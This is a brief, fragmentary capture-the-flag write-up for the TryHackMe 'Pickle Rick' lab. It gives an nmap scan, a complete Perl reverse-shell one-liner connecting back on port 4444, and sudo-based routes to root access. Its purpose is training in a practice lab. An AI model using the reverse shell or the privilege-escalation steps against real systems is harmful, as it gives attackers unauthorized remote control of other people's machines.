TryHackMe-PickleRick CTF


nmap -T4 -A -p-

Port 80


perl -e 'use Socket;$i="";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

First Ingredient

Second Ingredient

Third Ingredient

  1. Since we can ran any command by writing “sudo” before it so one way is to look into “ubuntu” folder and there we have a file called “.bash_history”
  1. Another method for getting the third ingredient is by accessing “root” folder.
  1. Or you can run “sudo bash” , that would make you a root user.



